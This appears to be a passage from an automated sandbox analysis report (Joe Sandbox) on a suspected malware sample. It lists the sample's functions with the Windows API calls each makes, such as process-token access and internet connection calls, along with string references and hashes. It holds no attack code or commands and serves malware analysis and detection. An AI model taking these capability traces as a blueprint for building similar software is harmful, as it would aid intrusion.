Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: ba255c9f27353bc7b99a77791e72eb619ab227f8e3973c8785d28c761941dbbe
Instruction ID: 99c238332dc284d8eacdcfc1ad09dd05cba6d068f3026cb8e1d21c4755e0e576
Opcode Fuzzy Hash: ba255c9f27353bc7b99a77791e72eb619ab227f8e3973c8785d28c761941dbbe
Instruction Fuzzy Hash: 81E0E532505244EEDB215FE5FC0D7D87B14EB1A336F148376FA69680E2C7714998DB12

Function 00E78C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00E78C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00E7882E), ref: 00E78C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E7882E), ref: 00E78C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00E7882E), ref: 00E78C7E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 16e40e53e6e6e917db62c572f577b43bb31101a1f010d03e8c18d28287da5ec2
Instruction ID: 14e5a13eb1b0ebd3424b6024f550438977f0b0e153a6a874408b5dda97f41f0b
Opcode Fuzzy Hash: 16e40e53e6e6e917db62c572f577b43bb31101a1f010d03e8c18d28287da5ec2
Instruction Fuzzy Hash: 74E08636642211DFD7205FF26E0CB977BACEF6A796F098828F245E9050DA349449CB61

Function 00E62187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E62187
GetDC.USER32(00000000), ref: 00E62191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E621B1
ReleaseDC.USER32(?), ref: 00E621D2

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3591345c26c5e2f7b813a1f691bb07baf8787324739de551163519c566e7c2fa
Instruction ID: b9adf347a04867c42cbd70bf91b4313631be843ed6d240a7b9c7e2de8685c0eb
Opcode Fuzzy Hash: 3591345c26c5e2f7b813a1f691bb07baf8787324739de551163519c566e7c2fa
Instruction Fuzzy Hash: C2E0E5B5800614EFDB119FA1D808A9D7BF1EB8D351F108429F95AB7220CB38A1459F80

Function 00E6219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E6219B
GetDC.USER32(00000000), ref: 00E621A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E621B1
ReleaseDC.USER32(?), ref: 00E621D2

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 873bfb07c208859519e8e9d9610f8fb91eb8fe6923d47a713e4b481c5e3090e2
Instruction ID: ac7ad801337a4b923e65ef80dfc3c88884587b06c76893322790b5584b3213fe
Opcode Fuzzy Hash: 873bfb07c208859519e8e9d9610f8fb91eb8fe6923d47a713e4b481c5e3090e2
Instruction Fuzzy Hash: AAE012B5C00214AFCF219FB2D80869D7BF1EF8D311F108029F95AB7220CB38A1459F80

Function 00E263A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%, xrefs: 00E263AE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2291192146
Opcode ID: 680f41d997593371eea2cd8f846cfb8013bc58ac5464b16635683abde69dd59e
Instruction ID: 53017a6d203bd1b4ee2fe04fd2e64bed70472279392b1cd10c9cf979c9c904de
Opcode Fuzzy Hash: 680f41d997593371eea2cd8f846cfb8013bc58ac5464b16635683abde69dd59e
Instruction Fuzzy Hash: 2CB11571D001299BCF28EF94E8819FEB7B4FF44310F146626E952B7294DB309E86CB91

Function 00E9B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 00E9B2C3

Strings

xr, xrefs: 00E9B325
xr, xrefs: 00E9B2F9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __itow_s
String ID: xr$xr
API String ID: 3653519197-2528877900
Opcode ID: 845e1a09bc6b4b1aeb8daee9bd8c0f6778ce552f4e3aed009f4ba092497af653
Instruction ID: d1cc0d0942d821d2be02cb422a456fcadedf586201b9b81695e9ed925a5ac6ec
Opcode Fuzzy Hash: 845e1a09bc6b4b1aeb8daee9bd8c0f6778ce552f4e3aed009f4ba092497af653
Instruction Fuzzy Hash: 00B19E70A00209AFDF14DF54D981EAEB7FAFF58304F14A459F945AB292EB70E941CB60

Function 00E8B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3FEC6: _wcscpy.LIBCMT ref: 00E3FEE9

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

__wcsnicmp.LIBCMT ref: 00E8B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E8B361

Strings

LPT, xrefs: 00E8B292

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: a0d61f03a9802ed9ab3830d360b467eb70dce759ac43861cf7055ece2f6c030d
Instruction ID: a43ffd5f26e7108f14338e8643738bc9c337d9b1a04ceebf2eda35f3b252f528
Opcode Fuzzy Hash: a0d61f03a9802ed9ab3830d360b467eb70dce759ac43861cf7055ece2f6c030d
Instruction Fuzzy Hash: 14617175A00215AFCB14EF94D885EAEB7F4EF48310F15646AF54EBB291DB70AE80CB50

Function 00E68A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E68B1E
_memmove.LIBCMT ref: 00E68B78

Strings

Oa, xrefs: 00E68BF2, 00E6E39A, 00E6E3B6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove
String ID: Oa
API String ID: 4104443479-3945284152
Opcode ID: 5556628a6899630c51b6b299e05eb2889aa2b06d5634f20b895ecf61dd276564
Instruction ID: 18b054de4e903d377d162c091bc714a72f06501ca80ad8a2c24f1fcfa2e2594b
Opcode Fuzzy Hash: 5556628a6899630c51b6b299e05eb2889aa2b06d5634f20b895ecf61dd276564
Instruction Fuzzy Hash: 4751B4B4940609DFCF64CFA8D584AAEBBF0FF44348F10562AE85AE7340DB31A995CB50

Function 00E32AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00E32AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00E32AE1

Strings

@, xrefs: 00E32AD5

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f7095837ba0d882267a574d6a4fd1a0309cf3858b8f0e6d2f481bdafb6cffc65
Instruction ID: 1d4a0238eb02726685b1b6e0b2d54ca280852f530f6d9ce11b200e111a9da995
Opcode Fuzzy Hash: f7095837ba0d882267a574d6a4fd1a0309cf3858b8f0e6d2f481bdafb6cffc65
Instruction Fuzzy Hash: 61515A724187549BD320AF11EC86FAFBBE8FF84310F42585DF1D9611A6DB318929CB16

Function 00E899BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E2506B: __fread_nolock.LIBCMT ref: 00E25089

_wcscmp.LIBCMT ref: 00E89AAE
_wcscmp.LIBCMT ref: 00E89AC1

Strings

FILE, xrefs: 00E899FA

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: be726bff6519ac3f41e7415d520da85be01a90763f7fa20050a0e970a512d994
Instruction ID: 663e3c2b284bd56cb96bd1c04f92390ada21d0cc1515d33e77e1b9757283796b
Opcode Fuzzy Hash: be726bff6519ac3f41e7415d520da85be01a90763f7fa20050a0e970a512d994
Instruction Fuzzy Hash: 0641E372A00619BADF21AAA0DC45FEFBBF9DF45714F04007AB908B7181DA75AA0487A1

Function 00E6099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E609A9

Strings

Dt, xrefs: 00E2A477
Dt, xrefs: 00E2A2B1

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClearVariant
String ID: Dt$Dt
API String ID: 1473721057-4168040075
Opcode ID: 0d5354c3b22a3d108f38439c422c62f9d543f0b46cb0e2b7ad70c7c05de57f3d
Instruction ID: 5cefe3eced4aab6da8f7a7b372e97046d22bfc1a7076275df68ea7983676d98c
Opcode Fuzzy Hash: 0d5354c3b22a3d108f38439c422c62f9d543f0b46cb0e2b7ad70c7c05de57f3d
Instruction Fuzzy Hash: 57510774608355CFD754CF19E480A1ABBF1BB99348F58A86CF981AB361D331EC85CB42

Function 00E92882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E92892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E928C8

Strings

|, xrefs: 00E92899

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 770a6f21dd8869eb5849858d7d20ccb6442f8bac8f8128dad12122b16fb61aa6
Instruction ID: 0ef5ae6e2bae10d649a77d257b9847f682fdb6a391092744ef4c971f319c5fee
Opcode Fuzzy Hash: 770a6f21dd8869eb5849858d7d20ccb6442f8bac8f8128dad12122b16fb61aa6
Instruction Fuzzy Hash: 90313771800129AFCF05AFA1DC85EEEBFB8FF08300F005029F954B6166EA315A56DBA0

Function 00EA6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00EA6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EA6DC2

Strings

static, xrefs: 00EA6D22

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 24685fe341081d352f52daf65a24e8e7e1386eaeb21aedecc706f59ce1cef9e7
Instruction ID: 8f82d0e0da60b9145f40bcddfed27588abd4a34ee82dd533b6fffd3e7dabbaf7
Opcode Fuzzy Hash: 24685fe341081d352f52daf65a24e8e7e1386eaeb21aedecc706f59ce1cef9e7
Instruction Fuzzy Hash: 9C31A171200204AEDB109F74CC80AFB77B9FF8A764F14A619F995AB190DB31BC51CB60

Function 00E82D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E82E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E82E3B

Strings

0, xrefs: 00E82DF9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: ef2e734615e5ff7d4ad3e8724957513a116e5f4b593bc9c209b9e6f9f3360910
Instruction ID: 9b1dbd2970e1f770869cc20b1dcb5f3faf5c20f5199a5cbeda129e5502f4c4a3
Opcode Fuzzy Hash: ef2e734615e5ff7d4ad3e8724957513a116e5f4b593bc9c209b9e6f9f3360910
Instruction Fuzzy Hash: 0731F731A00309AFEB26AF58D84579EBBF5EF05344F14102DEA8DB61A0D7709944CB18

Function 00EA6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EA69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EA69DB

Strings

Combobox, xrefs: 00EA699D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 96e0d586e7aabd796e2e34d984c69f0e932d636427b3df3d19a3f43302809508
Instruction ID: 7e8fabf543ef6956ec61f497c985cff6172281c16a89a071cd7c58d0021907a2
Opcode Fuzzy Hash: 96e0d586e7aabd796e2e34d984c69f0e932d636427b3df3d19a3f43302809508
Instruction Fuzzy Hash: 90119071600208AFEF159E14CC80EAB37AAEB9A3A8F151125F958BF290D671AC5187A0

Function 00EA6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00E21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E21D73
Part of subcall function 00E21D35: GetStockObject.GDI32(00000011), ref: 00E21D87
Part of subcall function 00E21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E21D91

GetWindowRect.USER32(00000000,?), ref: 00EA6EE0
GetSysColor.USER32(00000012), ref: 00EA6EFA

Strings

static, xrefs: 00EA6EBD

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9ae7a457d36532ad9e52fd0961b215238f2480a05a8c22a4c8ee3226a96be6a8
Instruction ID: 38bf051135d29a4500274777ba8377c3c72a29a796ed1e5ee77c5ee099fdf645
Opcode Fuzzy Hash: 9ae7a457d36532ad9e52fd0961b215238f2480a05a8c22a4c8ee3226a96be6a8
Instruction Fuzzy Hash: A6215972610209AFDB04DFA8DC45AEA7BF8FB0E314F045629FA55E7250E734F8619B50

Function 00EA6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00EA6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EA6C20

Strings

edit, xrefs: 00EA6BF5

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 565746777d0b65cec42403b364bc7d9fafd1faacb4be6bb7a2c98f0d42b7a6fe
Instruction ID: 1a9d166a24c59e063ff7c90c0db157baa3883a6e0a14e897438a97ac59cd98ba
Opcode Fuzzy Hash: 565746777d0b65cec42403b364bc7d9fafd1faacb4be6bb7a2c98f0d42b7a6fe
Instruction Fuzzy Hash: 79118F71500208AFEB108F64DC45AEB3769EB1B378F145724F961EB1E0C775EC919B60

Function 00E82E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E82F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E82F30

Strings

0, xrefs: 00E82F07

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 428732b5a9c7266684c77e466f42a52cb72c70483efe9a3e9656e9541858cd6f
Instruction ID: 09af82fc04ecf8b9d3f77d5668fff2cef2e286bc9e65517884b94e31e44a3121
Opcode Fuzzy Hash: 428732b5a9c7266684c77e466f42a52cb72c70483efe9a3e9656e9541858cd6f
Instruction Fuzzy Hash: E811D031E01118ABCB35EB58DD44B9973B9EB15358F0410BAFB4CB72A0D7B0AD04C795

Function 00E924CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E92520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E92549

Strings

<local>, xrefs: 00E92511

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: a946551f366e150a092018808a27a623e4dfb0a3feeb0dba8c440cd176eb729d
